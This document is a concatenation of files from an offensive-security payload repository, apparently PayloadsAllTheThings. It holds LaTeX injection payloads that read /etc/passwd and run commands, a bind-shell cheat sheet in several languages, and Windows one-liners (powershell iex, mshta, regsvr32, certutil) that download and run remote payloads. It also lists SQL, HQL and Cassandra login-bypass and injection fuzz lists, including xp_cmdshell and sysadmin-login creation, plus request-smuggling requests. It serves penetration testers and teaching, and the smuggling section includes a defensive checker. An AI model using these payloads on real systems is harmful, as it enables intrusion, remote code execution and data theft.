-------------------------------------------------------------------------------- /LDAP Injection/Intruder/LDAP_attributes.txt: --------------------------------------------------------------------------------
c
cn
co
commonName
dc
facsimileTelephoneNumber
givenName
gn
homePhone
id
jpegPhoto
l
mail
mobile
name
o
objectClass
ou
owner
pager
password
sn
st
surname
uid
username
userPassword

-------------------------------------------------------------------------------- /LICENSE: --------------------------------------------------------------------------------
MIT License

Copyright (c) 2019 Swissky

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

-------------------------------------------------------------------------------- /LaTeX Injection/README.md: --------------------------------------------------------------------------------
# LaTeX Injection

## Read file

```bash
\input{/etc/passwd}
\include{password} # load .tex file
```

Read a single-line file

```bash
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```

Read a multi-line file

```bash
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
    \read\file to\fileline
    \text{\fileline}
\repeat
\closein\file
```

Read a text file, keeping the formatting

```bash
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```

## Write file

```bash
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
```

## Command execution

The command's output is not inserted into the document; redirect it to a temp file and read that file back.
```bash
\immediate\write18{env > output}
\input{output}
```

If you get a LaTeX error, consider base64-encoding the result to avoid bad characters

```bash
\immediate\write18{env | base64 > test.tex}
\input{test.tex}
```

```bash
\input|ls|base64
\input{|"/bin/hostname"}
```

## Cross Site Scripting

From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)

```bash
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```

Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$`

## References

* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)

-------------------------------------------------------------------------------- /Methodology and Resources/Bind Shell Cheatsheet.md: --------------------------------------------------------------------------------
# Bind Shell

## Summary

* [Bind Shell](#bind-shell)
  * [Perl](#perl)
  * [Python](#python)
  * [PHP](#php)
  * [Ruby](#ruby)
  * [Netcat Traditional](#netcat-traditional)
  * [Netcat OpenBsd](#netcat-openbsd)
  * [Ncat](#ncat)
  * [Socat](#socat)
  * [Powershell](#powershell)

## Perl

```perl
perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\
bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\
close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};'
```

## Python

Single line:

```python
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",51337));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
```

Expanded version:

```python
import socket as s, subprocess as sp

s1 = s.socket(s.AF_INET, s.SOCK_STREAM)
s1.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1)
s1.bind(("0.0.0.0", 51337))
s1.listen(1)
c, a = s1.accept()

while True:
    d = c.recv(1024).decode()
    p = sp.Popen(d, shell=True, stdout=sp.PIPE, stderr=sp.PIPE, stdin=sp.PIPE)
    c.sendall(p.stdout.read() + p.stderr.read())
```

## PHP

```php
php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\
socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\
$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\
socket_write($cl,$m,strlen($m));}}'
```

## Ruby

```ruby
ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)'
```

## Netcat Traditional

```powershell
nc -nlvp 51337 -e /bin/bash
```

## Netcat OpenBsd

```powershell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f
```

## Socat

```powershell
user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345
user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
```

## Powershell

```powershell
https://github.com/besimorhino/powercat

# Victim (listen)
. .\powercat.ps1
powercat -l -p 7002 -ep

# Connect from attacker
. .\powercat.ps1
powercat -c 127.0.0.1 -p 7002
```

-------------------------------------------------------------------------------- /Methodology and Resources/Miscellaneous - Tricks.md: --------------------------------------------------------------------------------
# Miscellaneous & Tricks

All the tricks that couldn't be classified somewhere else.

## Send a message to another user

```powershell
# Windows
PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !"
PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !"

# Linux
$ wall "Stop messing with the XXX service !"
$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root
$ who
$ write root pts/2 # press Ctrl+D after typing the message.
```

-------------------------------------------------------------------------------- /Methodology and Resources/Windows - Download and Execute.md: --------------------------------------------------------------------------------
# Windows - Download and execute methods

## Downloaded files location

- C:\Users\\AppData\Local\Microsoft\Windows\Temporary Internet Files\
- C:\Users\\AppData\Local\Microsoft\Windows\INetCache\IE\
- C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

## Powershell

From an HTTP server

```powershell
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
```

From a WebDAV server

```powershell
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
```

## Cmd

```powershell
cmd.exe /k < \\webdavserver\folder\batchfile.txt
```

## Cscript / Wscript

```powershell
cscript //E:jscript \\webdavserver\folder\payload.txt
```

## Mshta

```powershell
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
```

```powershell
mshta http://webserver/payload.hta
```

```powershell
mshta \\webdavserver\folder\payload.hta
```

## Rundll32

```powershell
rundll32 \\webdavserver\folder\payload.dll,entrypoint
```

```powershell
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
```

## Regasm / Regsvc @subTee

```powershell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
```

## Regsvr32 @subTee

```powershell
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
```

```powershell
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
```

## Odbcconf

```powershell
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
```

## Msbuild

```powershell
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
```

## Certutil

```powershell
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
```

```powershell
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
```

## Bitsadmin

```powershell
bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
```

## References

- [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)

-------------------------------------------------------------------------------- /NoSQL Injection/Intruder/NoSQL.txt: --------------------------------------------------------------------------------

-------------------------------------------------------------------------------- /Open Redirect/Intruder/open_redirect_wordlist.txt:
--------------------------------------------------------------------------------

-------------------------------------------------------------------------------- /Open Redirect/Intruder/openredirects.txt: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /Race Condition/README.md: --------------------------------------------------------------------------------
# Race Condition

> Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language.

## Summary

* [Tools](#tools)
* [Turbo Intruder Examples](#turbo-intruder-examples)
* [References](#references)

## Tools

* [Turbo Intruder - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.](https://github.com/PortSwigger/turbo-intruder)

## Turbo Intruder Examples

1. Send the request to Turbo Intruder
2. Use this Python code as the Turbo Intruder payload

```python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=30,
                           pipeline=False
                           )

    for i in range(30):
        engine.queue(target.req, i)
        engine.queue(target.req, target.baseInput, gate='race1')

    engine.start(timeout=5)
    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)
```

3. Now set the external HTTP header `x-request: %s` - :warning: This is needed by Turbo Intruder
4. Click "Attack"

## References

* [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247)
* [Turbo Intruder: Embracing the billion-request attack - James Kettle | 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)
* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)

-------------------------------------------------------------------------------- /Request Smuggling/README.md: --------------------------------------------------------------------------------
# Request Smuggling

## Summary

* [Tools](#tools)
* [CL.TE vulnerabilities](#cl.te-vulnerabilities)
* [TE.CL vulnerabilities](#te.cl-vulnerabilities)
* [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header)
* [References](#references)

## Tools

* [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646)
* [Smuggler](https://github.com/defparam/smuggler)

## CL.TE vulnerabilities

> The front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header.

```powershell
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED
```

Example:

```powershell
POST / HTTP/1.1
Host: domain.example.com
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G
```

Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te

## TE.CL vulnerabilities

> The front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header.

```powershell
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0
```

Example:

```powershell
POST / HTTP/1.1
Host: domain.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86
Content-Length: 4
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0


```

:warning: To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked. You need to include the trailing sequence `\r\n\r\n` following the final 0.

Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl

## TE.TE behavior: obfuscating the TE header

> The front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.
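The framing disagreement behind the CL.TE and TE.CL requests above, and the strict front-end checks that catch the TE.TE header variants, as an added Python example that is not part of the original page or the PayloadsAllTheThings repository; the request byte strings are constructed from the requests shown on this page, and the function names and violation messages are this example's own.

```python
"""Framing checker for the CL.TE, TE.CL and TE.TE cases above (constructed
example, not code from the PayloadsAllTheThings repository).

analyze() parses one raw request twice, as a Content-Length parser and as a
chunked parser, and reports what each would treat as the start of the NEXT
request on the connection; a disagreement is the desync. framing_violations()
is the strict front-end rule that prevents it: reject instead of guessing
(RFC 7230 s.3.3.3: a message carrying both headers ought to be treated as an error).
"""


def split_request(raw: bytes):
    """Return ([(name, value-or-None)], body); value is None when the header
    line has no colon. Names and values are kept exactly as sent."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end-of-headers marker")
    headers = []
    for line in head.split(b"\r\n")[1:]:           # [0] is the request line
        name, colon, value = line.partition(b":")
        headers.append((name, value if colon else None))
    return headers, body


def header_values(headers, wanted: bytes):
    """Lenient lookup (strip + lowercase the name), as tolerant servers do.
    A list, because duplicate framing headers are part of the problem."""
    return [v.strip() for n, v in headers
            if v is not None and n.strip().lower() == wanted]


def chunked_end(body: bytes):
    """Offset just past the terminating chunk, or None while the stream is
    incomplete (a chunked parser keeps waiting). Trailers are not handled."""
    pos = 0
    while True:
        nl = body.find(b"\r\n", pos)
        if nl < 0:
            return None
        size = int(body[pos:nl].split(b";")[0].strip(), 16)   # hex chunk size
        pos = nl + 2
        if size == 0:                                          # last chunk
            return pos + 2 if body[pos:pos + 2] == b"\r\n" else None
        if len(body) < pos + size + 2:                         # data + CRLF
            return None
        pos += size + 2


def analyze(raw: bytes):
    """Compare CL framing with TE framing on the same bytes."""
    headers, body = split_request(raw)
    cl = header_values(headers, b"content-length")
    te = header_values(headers, b"transfer-encoding")
    report = {"cl_leftover": None, "te_leftover": None}
    if cl:
        report["cl_leftover"] = body[min(int(cl[0]), len(body)):]
    if any(v.lower() == b"chunked" for v in te):
        end = chunked_end(body)
        report["te_leftover"] = None if end is None else body[end:]
    report["desync"] = bool(cl and te and
                            report["cl_leftover"] != report["te_leftover"])
    return report


def framing_violations(raw: bytes):
    """Strict checks for a front-end: any reason means answer 400 and close.
    Covers the TE.TE header spellings listed on this page."""
    headers, _ = split_request(raw)
    reasons = []
    te = [(n, v) for n, v in headers
          if v is not None and n.strip().lower() == b"transfer-encoding"]
    cl = header_values(headers, b"content-length")
    if te and cl:
        reasons.append("both Content-Length and Transfer-Encoding present")
    if len(cl) > 1 or len(te) > 1:
        reasons.append("duplicate framing header")
    for name, value in headers:
        if value is None or not name.strip():
            reasons.append("malformed header line (missing name or colon)")
        elif b"\n" in name or b"\n" in value:
            reasons.append("bare LF inside a header line")
    for name, value in te:
        if name != name.strip():
            reasons.append("whitespace around the Transfer-Encoding name")
        if value.strip() != value.lstrip(b" "):
            reasons.append("tab or trailing whitespace around the TE value")
        if value.strip().lower() != b"chunked":
            reasons.append("transfer coding is not exactly 'chunked'")
    return reasons


# Constructed request bytes: the two requests shown on this page plus a clean one.
CL_TE = (b"POST / HTTP/1.1\r\nHost: vulnerable-website.com\r\n"
         b"Content-Length: 13\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nSMUGGLED")
TE_CL = (b"POST / HTTP/1.1\r\nHost: vulnerable-website.com\r\n"
         b"Content-Length: 3\r\nTransfer-Encoding: chunked\r\n\r\n8\r\nSMUGGLED\r\n0\r\n\r\n")
CLEAN = (b"POST / HTTP/1.1\r\nHost: vulnerable-website.com\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n8\r\nSMUGGLED\r\n0\r\n\r\n")
# The TE.TE spellings from this page, each dropped into an otherwise clean request.
TE_TE_HEADERS = [b"Transfer-Encoding: xchunked", b"Transfer-Encoding : chunked",
                 b"Transfer-Encoding: chunked\r\nTransfer-Encoding: x",
                 b"Transfer-Encoding:\tchunked", b" Transfer-Encoding: chunked",
                 b"X: X\nTransfer-Encoding: chunked", b"Transfer-Encoding\r\n: chunked"]


def te_te_request(header_line: bytes) -> bytes:
    return (b"POST / HTTP/1.1\r\nHost: vulnerable-website.com\r\n" + header_line
            + b"\r\n\r\n8\r\nSMUGGLED\r\n0\r\n\r\n")
```

`analyze(CL_TE)` reports `SMUGGLED` as the chunked parser's leftover while the Content-Length parser consumes everything; for `TE_CL` the roles flip, and `framing_violations` is non-empty for every TE.TE spelling and empty for the clean request.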
```powershell
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[tab]chunked
[space]Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
Transfer-Encoding
: chunked
```

Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header

## References

* [PortSwigger - Request Smuggling Tutorial](https://portswigger.net/web-security/request-smuggling) and [PortSwigger - Request Smuggling Reborn](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn)
* [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - 2020, October 16](https://blog.cobalt.io/a-pentesters-guide-to-http-request-smuggling-8b7bf0db1f0)

-------------------------------------------------------------------------------- /SQL Injection/Cassandra Injection.md: --------------------------------------------------------------------------------
# Cassandra Injection

> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system.

## Summary

* [Cassandra comment](#cassandra-comment)
* [Cassandra - Login Bypass](#cassandra---login-bypass)
  * [Login Bypass 0](#login-bypass-0)
  * [Login Bypass 1](#login-bypass-1)
* [References](#references)

## Cassandra comment

```sql
/* Cassandra Comment */
```

## Cassandra - Login Bypass

### Login Bypass 0

```sql
username: admin' ALLOW FILTERING; %00
password: ANY
```

### Login Bypass 1

```sql
username: admin'/*
password: */and pass>'
```

The injection would look like the following SQL query

```sql
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
```

## References

-------------------------------------------------------------------------------- /SQL Injection/HQL Injection.md: --------------------------------------------------------------------------------
# Hibernate Query Language Injection

> Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia

## Summary

* [HQL Comments](#hql-comments)
* [HQL List Columns](#hql-list-columns)
* [HQL Error Based](#hql-error-based)
* [References](#references)

## HQL Comments

```sql
HQL does not support comments
```

## HQL List Columns

```sql
from BlogPosts
where title like '%'
and DOESNT_EXIST=1 and ''='%' --
and published = true
```

Using a non-existent column raises an exception that leaks several column names.
```sql
org.hibernate.exception.SQLGrammarException: Column "DOESNT_EXIST" not found; SQL statement:
select blogposts0_.id as id21_, blogposts0_.author as author21_, blogposts0_.promoCode as promo3_21_, blogposts0_.title as title21_, blogposts0_.published as published21_ from BlogPosts blogposts0_ where blogposts0_.title like '%' or DOESNT_EXIST='%' and blogposts0_.published=1 [42122-159]
```

## HQL Error Based

```sql
from BlogPosts
where title like '%11'
and (select password from User where username='admin')=1
or ''='%'
and published = true
```

Error based on value casting.

```sql
Data conversion error converting "d41d8cd98f00b204e9800998ecf8427e"; SQL statement:
select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.promotionCode as promotio3_18_, blogposts0_.title as title18_, blogposts0_.visible as visible18_ from BlogPosts blogposts0_ where blogposts0_.title like '%11' and (select user1_.password from User user1_ where user1_.username = 'admin')=1 or ''='%' and blogposts0_.published=1
```

:warning: **HQL does not support UNION queries**

## References

* [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html)
* [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language)
* [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf)
* [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm)
* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/)

-------------------------------------------------------------------------------- /SQL Injection/Intruder/Auth_Bypass.txt: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /SQL Injection/Intruder/Auth_Bypass2.txt: --------------------------------------------------------------------------------
substring(password/text(),1,1)='7 119 | ' and substring(password/text(),1,1)='7 120 | ' or 1=1 limit 1 -- -+ 121 | '="or' 122 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MSSQL-WHERE_Time.txt: -------------------------------------------------------------------------------- 1 | waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ) waitfor delay '0:0:20' /* 8 | ) waitfor delay '0:0:20' -- 9 | )) waitfor delay '0:0:20' /* 10 | )) waitfor delay '0:0:20' -- 11 | ))) waitfor delay '0:0:20' /* 12 | ))) waitfor delay '0:0:20' -- 13 | )))) waitfor delay '0:0:20' /* 14 | )))) waitfor delay '0:0:20' -- 15 | ))))) waitfor delay '0:0:20' -- 16 | )))))) waitfor delay '0:0:20' -- 17 | ') waitfor delay '0:0:20' /* 18 | ') waitfor delay '0:0:20' -- 19 | ") waitfor delay '0:0:20' /* 20 | ") waitfor delay '0:0:20' -- 21 | ')) waitfor delay '0:0:20' /* 22 | ')) waitfor delay '0:0:20' -- 23 | ")) waitfor delay '0:0:20' /* 24 | ")) waitfor delay '0:0:20' -- 25 | '))) waitfor delay '0:0:20' /* 26 | '))) waitfor delay '0:0:20' -- 27 | "))) waitfor delay '0:0:20' /* 28 | "))) waitfor delay '0:0:20' -- 29 | ')))) waitfor delay '0:0:20' /* 30 | ')))) waitfor delay '0:0:20' -- 31 | ")))) waitfor delay '0:0:20' /* 32 | ")))) waitfor delay '0:0:20' -- 33 | '))))) waitfor delay '0:0:20' /* 34 | '))))) waitfor delay '0:0:20' -- 35 | "))))) waitfor delay '0:0:20' /* 36 | "))))) waitfor delay '0:0:20' -- 37 | ')))))) waitfor delay '0:0:20' /* 38 | ')))))) waitfor delay '0:0:20' -- 39 | ")))))) waitfor delay '0:0:20' /* 40 | ")))))) waitfor delay '0:0:20' -- -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MSSQL.txt: -------------------------------------------------------------------------------- 1 | # you will need to customize/modify 
some of the values in the queries for best effect 2 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 3 | 'create user name identified by 'pass123' -- 4 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 5 | ' ; drop table temp -- 6 | 'exec sp_addlogin 'name' , 'password' -- 7 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 8 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 9 | ' grant connect to name; grant resource to name; -- 10 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) 11 | ' or 1=1 -- 12 | ' union (select @@version) -- 13 | ' union (select NULL, (select @@version)) -- 14 | ' union (select NULL, NULL, (select @@version)) -- 15 | ' union (select NULL, NULL, NULL, (select @@version)) -- 16 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 17 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- 18 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MSSQL_Enumeration.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/SQL Injection/Intruder/FUZZDB_MSSQL_Enumeration.txt -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MYSQL.txt: -------------------------------------------------------------------------------- 1 | 1'1 2 | 1 exec sp_ (or exec xp_) 3 | 1 and 1=1 4 | 1' and 1=(select count(*) from tablenames); -- 5 | 1 or 1=1 6 | 1' or '1'='1 7 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MySQL-WHERE_Time.txt: 
-------------------------------------------------------------------------------- 1 | and 0=benchmark(3000000,MD5(1))%20/* 2 | and 0=benchmark(3000000,MD5(1))%20-- 3 | and 0=benchmark(3000000,MD5(1))%20%23 4 | ' and 0=benchmark(3000000,MD5(1))%20/* 5 | ' and 0=benchmark(3000000,MD5(1))%20-- 6 | ' and 0=benchmark(3000000,MD5(1))%20%23 7 | " and 0=benchmark(3000000,MD5(1))%20/* 8 | " and 0=benchmark(3000000,MD5(1))%20-- 9 | " and 0=benchmark(3000000,MD5(1))%20%23 10 | ) and 0=benchmark(3000000,MD5(1))%20/* 11 | ) and 0=benchmark(3000000,MD5(1))%20-- 12 | ) and 0=benchmark(3000000,MD5(1))%20%23 13 | )) and 0=benchmark(3000000,MD5(1))%20/* 14 | )) and 0=benchmark(3000000,MD5(1))%20-- 15 | )) and 0=benchmark(3000000,MD5(1))%20%23 16 | ))) and 0=benchmark(3000000,MD5(1))%20/* 17 | ))) and 0=benchmark(3000000,MD5(1))%20-- 18 | ))) and 0=benchmark(3000000,MD5(1))%20%23 19 | )))) and 0=benchmark(3000000,MD5(1))%20/* 20 | )))) and 0=benchmark(3000000,MD5(1))%20-- 21 | )))) and 0=benchmark(3000000,MD5(1))%20%23 22 | ') and 0=benchmark(3000000,MD5(1))%20/* 23 | ') and 0=benchmark(3000000,MD5(1))%20-- 24 | ') and 0=benchmark(3000000,MD5(1))%20%23 25 | ") and 0=benchmark(3000000,MD5(1))%20/* 26 | ") and 0=benchmark(3000000,MD5(1))%20-- 27 | ") and 0=benchmark(3000000,MD5(1))%20%23 28 | ')) and 0=benchmark(3000000,MD5(1))%20/* 29 | ')) and 0=benchmark(3000000,MD5(1))%20-- 30 | ')) and 0=benchmark(3000000,MD5(1))%20%23 31 | ")) and 0=benchmark(3000000,MD5(1))%20/* 32 | ")) and 0=benchmark(3000000,MD5(1))%20-- 33 | ")) and 0=benchmark(3000000,MD5(1))%20%23 34 | '))) and 0=benchmark(3000000,MD5(1))%20/* 35 | '))) and 0=benchmark(3000000,MD5(1))%20-- 36 | '))) and 0=benchmark(3000000,MD5(1))%20%23 37 | "))) and 0=benchmark(3000000,MD5(1))%20/* 38 | "))) and 0=benchmark(3000000,MD5(1))%20-- 39 | "))) and 0=benchmark(3000000,MD5(1))%20%23 40 | ')))) and 0=benchmark(3000000,MD5(1))%20/* 41 | ')))) and 0=benchmark(3000000,MD5(1))%20-- 42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23 43 | 
")))) and 0=benchmark(3000000,MD5(1))%20/* 44 | ")))) and 0=benchmark(3000000,MD5(1))%20-- 45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23 -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt: -------------------------------------------------------------------------------- 1 | # mysql local file disclosure through sqli 2 | # fuzz interesting absolute filepath/filename into 3 | create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile; 4 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_Postgres_Enumeration.txt: -------------------------------------------------------------------------------- 1 | # info disclosure payload fuzzfile for pgsql 2 | select version(); 3 | select current_database(); 4 | select current_user; 5 | select session_user; 6 | select current_setting('log_connections'); 7 | select current_setting('log_statement'); 8 | select current_setting('port'); 9 | select current_setting('password_encryption'); 10 | select current_setting('krb_server_keyfile'); 11 | select current_setting('virtual_host'); 12 | select current_setting('port'); 13 | select current_setting('config_file'); 14 | select current_setting('hba_file'); 15 | select current_setting('data_directory'); 16 | select * from pg_shadow; 17 | select * from pg_group; 18 | create table myfile (input TEXT); 19 | copy myfile from '/etc/passwd'; 20 | select * from myfile;copy myfile to /tmp/test; 21 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/Generic_Fuzz.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 1' 3 | 1" 4 | [1] 5 | 1` 6 | 1\ 7 | 1/*'*/ 8 | 1/*!1111'*/ 9 | 1'||'asd'||' 10 | 1' or '1'='1 11 | 1 or 1=1 12 | 'or''=' -------------------------------------------------------------------------------- /SQL 
